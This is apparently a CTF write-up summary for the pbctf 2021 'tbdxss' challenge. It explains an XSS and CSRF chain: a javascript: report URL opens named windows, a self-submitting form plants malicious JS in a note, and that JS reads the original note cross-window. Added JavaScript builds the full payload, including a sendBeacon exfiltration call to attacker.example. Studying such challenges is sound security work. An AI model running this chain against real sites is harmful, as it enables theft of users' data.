Tags: csrf xss 

tl;dr:
* The report URL feature accepts `javascript:` URLs.
* Chrome's pop-up blocker doesn't seem to apply here, so the payload can open several windows.
* Open the original note in a named pop-up window: `window.open('https://tbdxss.chal.perfect.blue/note', 'first')`
* Open a second window pointing at a self-submitting form that overwrites the note with our malicious JS (the challenge has no CSRF token on that request).
* Open another window pointing at the note page so the malicious JS runs.
* Because both windows share an origin, the new note page can read the original window's contents with `window.open('', 'first').document.body.innerHTML` (an empty URL returns a handle to the existing window named `first` instead of navigating it).
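The chain above as one piece of code. This is an added example, not code from the original write-up: it generates the three artefacts the attacker needs (the `javascript:` report URL, the self-submitting CSRF page, and the note body that reads the named window) and includes a small same-origin check to show why the last step is allowed. The challenge origin and the `first` window name come from the tl;dr; the note endpoint path, the `note` field name, the attacker hostnames, the `sendBeacon` exfiltration and the 2 s delay are assumptions.

```javascript
// Added example (not from the original write-up). Target origin and window
// name are from the tl;dr; endpoint, field names, attacker URLs, exfiltration
// method and timing are assumptions.
const TARGET = 'https://tbdxss.chal.perfect.blue';
const NOTE_URL = `${TARGET}/note`;
const WINDOW_NAME = 'first';

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Step 2: page served from the attacker's host that POSTs the new note body.
// This only works because the note endpoint carries no CSRF token; the
// victim's session cookie is attached to the cross-site POST.
function selfSubmittingForm(action, fields) {
  const inputs = Object.entries(fields)
    .map(([name, value]) =>
      `<input type="hidden" name="${escapeHtml(name)}" value="${escapeHtml(value)}">`)
    .join('\n    ');
  return `<!doctype html>
<body>
  <form id="f" method="POST" action="${escapeHtml(action)}">
    ${inputs}
  </form>
  <script>document.getElementById('f').submit();</script>
</body>`;
}

// Step 4: JS stored in the note and executed when the note page is reloaded.
// window.open('', name) with an empty URL returns a handle to the existing
// window of that name instead of navigating it; both windows are same-origin,
// so its document is readable. Exfiltration via sendBeacon is an assumption.
function exfilNote(exfilUrl) {
  return `var w = window.open('', ${JSON.stringify(WINDOW_NAME)});` +
    `var leak = w.document.body.innerHTML;` +
    `navigator.sendBeacon(${JSON.stringify(exfilUrl)}, leak);`;
}

// Steps 1-3: the javascript: URL submitted to the report feature. The pop-up
// blocker does not interfere, so three window.open calls all succeed. The
// delay (assumed) lets the CSRF POST land before the note page is reopened.
function reportPayload(csrfPageUrl, delayMs = 2000) {
  const script =
    `window.open(${JSON.stringify(NOTE_URL)}, ${JSON.stringify(WINDOW_NAME)});` +
    `window.open(${JSON.stringify(csrfPageUrl)});` +
    `setTimeout(function(){ window.open(${JSON.stringify(NOTE_URL)}); }, ${delayMs});`;
  // Percent-encode so a '#' or whitespace in the script cannot truncate the URL;
  // browsers percent-decode the body of a javascript: URL before evaluating it.
  return 'javascript:' + encodeURIComponent(script);
}

// Why step 4 is permitted: the same-origin policy compares scheme, host, port.
function sameOrigin(a, b) {
  const u = new URL(a), v = new URL(b);
  return u.protocol === v.protocol && u.hostname === v.hostname && u.port === v.port;
}

// Usage: host the form on the attacker's server, then report the payload URL.
const csrfPage = selfSubmittingForm(NOTE_URL, {
  note: exfilNote('https://attacker.example/leak'), // 'note' field is assumed
});
const payload = reportPayload('https://attacker.example/csrf.html');
console.log(csrfPage);
console.log(payload);
```

The `javascript:` URL is percent-encoded because the report feature stores and replays it as a URL: an unencoded `#` would be treated as a fragment and silently cut the script short.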

[See full write up for more details](https://bawolff.blogspot.com/2021/10/write-up-pbctf-2021-tbdxss.html).

Original writeup (https://bawolff.blogspot.com/2021/10/write-up-pbctf-2021-tbdxss.html).